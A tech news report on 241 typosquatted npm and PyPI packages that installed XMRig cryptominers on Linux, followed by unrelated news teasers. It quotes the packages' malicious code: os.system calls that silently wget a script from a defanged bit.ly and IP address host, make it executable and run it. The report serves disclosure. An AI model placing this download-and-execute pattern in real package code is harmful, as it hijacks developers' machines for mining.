241 npm and pypi packages caught dropping linux cryptominers

More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but instead, download and install cryptomining Bash scripts from the threat actor’s server.

On Wednesday, software developer and researcher Hauke Lübbers shared coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.

241 npm and pypi packages caught dropping linux cryptominers

55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via Bit.ly URL shortener.

os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”) os.system(“chmod +x .cmc >/dev/null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script notifies the threat actor of the IP address of the compromised host and if the deployment of cryptominers succeeded.

At the time of writing, we observed the IP address was down. But, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher’s claims:

241 npm and pypi packages caught dropping linux cryptominers

Excerpt from Bash script installing cryptominers (BleepingComputer)

The Sonatype security research team that I’m a part of, disclosed another 186 npm typosquatting packages today making contact with the same URL to download the malicious Bash script.

241 npm and pypi packages caught dropping linux cryptominers

npm packages pull malicious code from the same URL (Sonatype)

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing setup.py), it seems the open source repository’s race against threat actors is only getting even more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again, exploited typosquatting to infect developers.

Keyword: 241 npm and PyPI packages caught dropping Linux cryptominers

TECH'S NEWS RELATED

Multiple-doped hierarchical porous carbons for superior zinc ion storage

(a) Schematic illustration of the fabrication processes of the carbons and the advantages of this method; (b) the nitrogen adsorption/desorption isotherms and (c) the corresponding pore size distribution curves; (d) nitrogen adsorption/desorption isotherms of the carbons obtained from other molecular precursors. Credit: Science China Press Zn-ion hybrid supercapacitors (ZHSCs) ...

View more: Multiple-doped hierarchical porous carbons for superior zinc ion storage

Scientists have a bone to pick with paleontology's portrayal in video games

The representation of Tyrannosaurus rex in COTS video games through time. (a) 3D Monster Maze (1982, J. K. Greye Software). PC. (b) Primal Rage (1994, Midway Games West Inc) Super Nintendo Entertainment System. (c) Tomb Raider (1996, Core Design) PlayStation. (d) The Lost World: Jurassic Park (1997, DreamWorks Interactive) ...

View more: Scientists have a bone to pick with paleontology's portrayal in video games

Scalable and fully coupled quantum-inspired processor solves optimization problems

In a new study, researchers from TUS, Japan, proposed a fully connected scalable annealing processor that, when implemented in FPGA, can easily outperform a modern CPU in solving various combinatorial optimization problems in terms of speed and energy consumption. The proposed method achieves this using an “array calculator,” consisting ...

View more: Scalable and fully coupled quantum-inspired processor solves optimization problems

LHCf continues to investigate cosmic rays

One of the LHCf detectors. Credit: CERN LHCf has completed its first data-taking period during LHC Run 3, taking advantage of the record 13.6 TeV collision energy. This coincides with the machine’s record fill time of 57 hours. Millions of cosmic rays bombard the Earth’s atmosphere every second. These ...

View more: LHCf continues to investigate cosmic rays

PS+ October 2022 lineup revealed: Get Injustice 2, Hot Wheels Unleashed and more

Here's what you can expect from PS+ next month

View more: PS+ October 2022 lineup revealed: Get Injustice 2, Hot Wheels Unleashed and more

Active matter, curved spaces: Mini robots learn to 'swim' on stretchy surfaces

Two small robots move on a stretchy, trampoline-like surface. Credit: Shengkai Li / Hussain Gynai / Georgia Institute of Technology When self-propelling objects interact with each other, interesting phenomena can occur. Birds align with each other when they flock together. People at a concert spontaneously create vortices when they ...

View more: Active matter, curved spaces: Mini robots learn to 'swim' on stretchy surfaces

Official Super Mario Movie Twitter account opens, instantly amasses over 16k followers despite no tweets

The upcoming animated Super Mario Bros. movie has garnered tons of attention due to its somewhat controversial casting choices, the historically poor track record of video-game-to-film adaptations, and of course, the popularity of the Nintendo brand. Fans are evidently still frantically buzzing about the project if the response to the ...

View more: Official Super Mario Movie Twitter account opens, instantly amasses over 16k followers despite no tweets

Skill deficit biggest impediment in cloud transformation of Indian entities: IBM Survey

Getty ImagesSkill deficit has emerged as the biggest impediment for Indian entities in their cloud transformation journey, followed by compliance requirements and cyber security threats, a market research report of IBM said on Wednesday. The survey was conducted among 3,014 IT and business professionals, including over 250 from India, in ...

View more: Skill deficit biggest impediment in cloud transformation of Indian entities: IBM Survey

Floridians are livestreaming Hurricane Ian on TikTok

The hidden crisis of England's rural homelessness

Spanish vultures released in Cyprus to replenish population

Musk seeks to lift regulator 'muzzle' on Tesla tweets

Deadpool 3 release date reveal means Wolverine might be in Avengers 5

Google to test disabling Chrome Manifest V2 extensions in June 2023

Eero's Newest Mesh Router Draws Its Power Over Ethernet, No Outlet Necessary

Square now supports Apple ‘Tap to Pay on iPhone’ contactless payment system

Larval health of an Antarctic cold-water coral species may be resistant to warming water

You don't have to be a cute koala to be an Instagram influencer. Give lizards and bugs a chance

Are extreme heat waves happening more than expected? Research says not yet

Cookies might not be tracking you, but some of your favorite brands are

OTHER TECH NEWS

;